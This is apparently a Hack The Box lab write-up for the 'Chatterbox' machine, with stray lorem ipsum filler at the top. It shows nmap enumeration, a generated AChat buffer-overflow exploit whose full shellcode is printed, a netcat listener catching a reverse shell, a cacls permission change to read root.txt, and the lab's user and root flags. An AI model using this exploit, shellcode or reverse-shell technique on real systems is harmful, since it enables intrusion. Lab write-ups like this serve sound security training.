chatterbox - Hack The Box
“Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.”
██╗ ██╗███████╗███████╗██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██║ ██║███████╗█████╗ ██████╔╝ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ╚██████╔╝███████║███████╗██║ ██║ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝
- [root:/git/htb/chatterbox]# nmap -Pn -n -sCV 10.10.10.74 –open (master✱) Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:20 CET Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 201.69 seconds
Normal nmap scan finds nothing. Trying UDP returns the same, nothing. [root:/git/htb/chatterbox]# nmap -sU -sV –version-intensity 0 -F -n 10.10.10.74 (master✱) Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:24 CET Nmap scan report for 10.10.10.74 Host is up (0.035s latency). All 100 scanned ports on 10.10.10.74 are open|filtered
Expand the tcp scan by looking on all ports. [root:/git/htb/chatterbox]# nmap -p- -T5 10.10.10.74 (master✱) Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:33 CET Nmap scan report for chatterbox.htb (10.10.10.74) Host is up (0.034s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 9255/tcp open mon 9256/tcp open unknown
Version and script scan to see if we can figure out anything more about the services: [root:/git/htb/chatterbox]# nmap -sCV -p9255,9256 10.10.10.74 (master✱) Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:38 CET Nmap scan report for chatterbox.htb (10.10.10.74) Host is up (0.034s latency).
PORT STATE SERVICE VERSION 9255/tcp open http AChat chat system httpd |_http-server-header: AChat |_http-title: Site doesn’t have a title. 9256/tcp open achat AChat chat system
[root:/git/htb/chatterbox]# curl 10.10.10.74:9255 (master✱) [root:/git/htb/chatterbox]# curl 10.10.10.74:9256 (master✱) curl: (1) Received HTTP/0.9 when not allowed
- Google for ‘AChat enumerate port 9255 9256’ and I come across ‘achat reverse tcp exploit’. Downloading the files, modify the payload-file to create a ‘windows/shell_reverse_tcp’ payload rather then meterpreter (no go in OSCP).
Generate the payload, edit the exploit-file with the new buf-data, and lastly change the server address (in the script) to our victim.
[root:/git/htb/chatterbox]# ./AChat_Payload.sh (master✱) RHOST: 10.10.10.74 LHOST: 10.10.14.5 LPORT: 4488 Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/unicode_mixed x86/unicode_mixed succeeded with size 774 (iteration=0) x86/unicode_mixed chosen with final size 774 Payload size: 774 bytes Final size of python file: 3767 bytes buf = b”” buf += b”\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49” buf += b”\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41” buf += b”\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41” buf += b”\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51” buf += b”\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31” buf += b”\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41” buf += b”\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41” buf += b”\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41” buf += b”\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41” buf += b”\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x48\x68\x35\x32” buf += b”\x39\x70\x4b\x50\x6b\x50\x53\x30\x31\x79\x6b\x35\x50” buf += b”\x31\x55\x70\x4f\x74\x62\x6b\x42\x30\x6e\x50\x42\x6b” buf += b”\x6e\x72\x6a\x6c\x44\x4b\x6e\x72\x4e\x34\x34\x4b\x52” buf += b”\x52\x4d\x58\x7a\x6f\x74\x77\x4f\x5a\x4d\x56\x6d\x61” buf += b”\x59\x6f\x74\x6c\x6f\x4c\x70\x61\x43\x4c\x6c\x42\x4c” buf += b”\x6c\x6f\x30\x35\x71\x78\x4f\x7a\x6d\x4d\x31\x56\x67” buf += b”\x57\x72\x4c\x32\x52\x32\x51\x47\x62\x6b\x62\x32\x4a” buf += b”\x70\x62\x6b\x4e\x6a\x4d\x6c\x44\x4b\x30\x4c\x4e\x31” buf += b”\x42\x58\x38\x63\x6d\x78\x59\x71\x47\x61\x70\x51\x44” buf += b”\x4b\x52\x39\x4f\x30\x6d\x31\x78\x53\x64\x4b\x51\x39” buf += b”\x7a\x78\x69\x53\x6e\x5a\x6d\x79\x62\x6b\x4d\x64\x64” buf += b”\x4b\x6d\x31\x49\x46\x50\x31\x59\x6f\x54\x6c\x76\x61” buf += b”\x36\x6f\x6c\x4d\x59\x71\x49\x37\x6e\x58\x39\x50\x43” buf += b”\x45\x4c\x36\x6c\x43\x33\x4d\x6c\x38\x6f\x4b\x73\x4d” buf += b”\x6b\x74\x64\x35\x6b\x34\x72\x38\x44\x4b\x52\x38\x4d” buf += b”\x54\x7a\x61\x38\x53\x50\x66\x72\x6b\x4c\x4c\x70\x4b” buf += b”\x34\x4b\x61\x48\x4b\x6c\x39\x71\x68\x53\x54\x4b\x6d” buf += b”\x34\x32\x6b\x79\x71\x78\x50\x61\x79\x4f\x54\x6f\x34” buf += b”\x6d\x54\x61\x4b\x6f\x6b\x63\x31\x42\x39\x50\x5a\x52” buf += b”\x31\x49\x6f\x69\x50\x4f\x6f\x31\x4f\x51\x4a\x64\x4b” buf += b”\x6a\x72\x6a\x4b\x32\x6d\x6f\x6d\x72\x48\x6c\x73\x6d” buf += b”\x62\x4b\x50\x6d\x30\x73\x38\x53\x47\x70\x73\x70\x32” buf += b”\x31\x4f\x50\x54\x72\x48\x6e\x6c\x50\x77\x6e\x46\x69” buf += b”\x77\x4b\x4f\x67\x65\x57\x48\x64\x50\x6a\x61\x69\x70” buf += b”\x59\x70\x6b\x79\x66\x64\x4f\x64\x6e\x70\x52\x48\x4d” buf += b”\x59\x75\x30\x62\x4b\x69\x70\x59\x6f\x36\x75\x42\x30” buf += b”\x32\x30\x72\x30\x6e\x70\x6d\x70\x4e\x70\x4d\x70\x30” buf += b”\x50\x52\x48\x7a\x4a\x4a\x6f\x57\x6f\x67\x70\x59\x6f” buf += b”\x47\x65\x43\x67\x70\x6a\x4a\x65\x71\x58\x4a\x6a\x69” buf += b”\x7a\x6a\x6e\x59\x75\x32\x48\x6b\x52\x6b\x50\x6b\x61” buf += b”\x33\x58\x34\x49\x78\x66\x70\x6a\x6e\x30\x42\x36\x51” buf += b”\x47\x6f\x78\x35\x49\x54\x65\x30\x74\x63\x31\x79\x6f” buf += b”\x36\x75\x62\x65\x69\x30\x73\x44\x7a\x6c\x79\x6f\x70” buf += b”\x4e\x6a\x68\x44\x35\x5a\x4c\x30\x68\x38\x70\x57\x45” buf += b”\x34\x62\x71\x46\x4b\x4f\x48\x55\x61\x58\x33\x33\x52” buf += b”\x4d\x4f\x74\x6b\x50\x32\x69\x69\x53\x71\x47\x50\x57” buf += b”\x71\x47\x6c\x71\x79\x66\x4f\x7a\x4b\x62\x32\x39\x31” buf += b”\x46\x47\x72\x4b\x4d\x62\x46\x48\x47\x4d\x74\x4d\x54” buf += b”\x6f\x4c\x69\x71\x6b\x51\x72\x6d\x4e\x64\x6c\x64\x6c” buf += b”\x50\x67\x56\x49\x70\x6d\x74\x42\x34\x4e\x70\x6f\x66” buf += b”\x71\x46\x4f\x66\x61\x36\x52\x36\x6e\x6e\x62\x36\x62” buf += b”\x36\x6e\x73\x4e\x76\x53\x38\x30\x79\x58\x4c\x6d\x6f” buf += b”\x74\x46\x4b\x4f\x68\x55\x62\x69\x37\x70\x6e\x6e\x62” buf += b”\x36\x6f\x56\x4b\x4f\x4c\x70\x61\x58\x4d\x38\x54\x47” buf += b”\x6b\x6d\x33\x30\x6b\x4f\x66\x75\x67\x4b\x49\x50\x4d” buf += b”\x4d\x4d\x5a\x59\x7a\x61\x58\x76\x46\x34\x55\x77\x4d” buf += b”\x53\x6d\x39\x6f\x36\x75\x6f\x4c\x5a\x66\x51\x6c\x5a” buf += b”\x6a\x71\x70\x6b\x4b\x79\x50\x54\x35\x5a\x65\x55\x6b” buf += b”\x31\x37\x6b\x63\x31\x62\x72\x4f\x71\x5a\x79\x70\x51”
[root:/git/htb/chatterbox]# python AChat_Exploit.py (master✱) [+] BUFFER OVERFLOW PAYLOAD RELEASED – CHECK YOUR HANDLER
[root:/git/htb/chatterbox]# rlwrap nc -lvnp 4488 (master✱) listening on [any] 4488 … connect to [10.10.14.5] from (UNKNOWN) [10.10.10.74] 49161 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami chatterbox\alfred
- Grab user.txt
C:\Users\Alfred\Desktop> type user.txt 02c94ad2f3a9d10f7f327b895249a2f8
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██████╗ ██████╗ ██████╗ ████████╗ ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ██████╔╝██║ ██║██║ ██║ ██║ ██╔══██╗██║ ██║██║ ██║ ██║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝
- Once we have a reverse shell as Alfred, we notice that we got read access to the \Users\Administrator directory - usually the users don’t have permission to enter this folder.
C:\Users\Administrator\Desktop> type root.txt Access is denied.
Unfortunately we can’t just print root as of yet. But maybe the privileges of the Admin dir is a good place to start.
C:\Users\Administrator\Desktop> dir root.txt /q 03/26/2021 07:51 AM 34 CHATTERBOX\Alfred root.txt
C:\Users\Administrator\Desktop> cacls root.txt /G Alfred:R Are you sure (Y/N)? y processed file: C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop> type root.txt efd540d3337ebc9d2682bec22ab89f45
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██╗███╗ ██╗███████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ██║████╗ ██║██╔════╝██╔═══██╗██╔══██╗████╗ ████║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██╔████╔██║███████║ ██║ ██║██║ ██║██╔██╗ ██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║╚██╔╝██║██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ██║██║ ╚████║██║ ╚██████╔╝██║ ██║██║ ╚═╝ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
AChat Reverse TCP Exploit: https://github.com/EDB4YLI55/achat_reverse_tcp_exploit
File ownership Win7: https://superuser.com/questions/691578/how-to-display-change-the-owner-of-a-file-on-windows-7